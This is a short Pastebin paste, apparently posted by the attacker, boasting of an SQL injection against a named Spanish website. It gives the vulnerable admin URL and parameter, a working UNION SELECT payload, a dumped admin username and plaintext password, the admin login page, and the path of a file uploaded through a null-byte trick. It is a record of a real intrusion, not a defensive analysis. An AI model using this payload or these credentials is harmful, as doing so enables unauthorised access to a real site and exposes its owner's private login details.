hPlow

Auditoría a página web española

Feb 9th, 2020
206
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
  1. Target: http://www.floresteo.es/admin/listado.php?id_cat=5
  2. Parameter: id_cat=
  3. Vulnerability: SQL Injection
  4. Type: String
  5. Exploit/PoC: http://www.floresteo.es/admin/listado.php?id_cat=-5%27%20union%20all%20select%201,2,3,4,5,6--%20and%27x%27=%27y
  6. Automatized: None
  7. Hacker/Cracker/Coder: hPlow
  8.  
  9. Dump data
  10. _________________________________________________________
  11. id,0x3a,usuario,0x3a,password
  12. 1:paciano:flor1325
  13.  
  14. Note: Found the webpage admin -> http://www.floresteo.es/admin/login.php :)
  15.  
  16. File uploaded
  17. __________________________________________________________
  18. http://www.floresteo.es/up/index.html%2500
Advertisement
Add Comment
Please, Sign In to add comment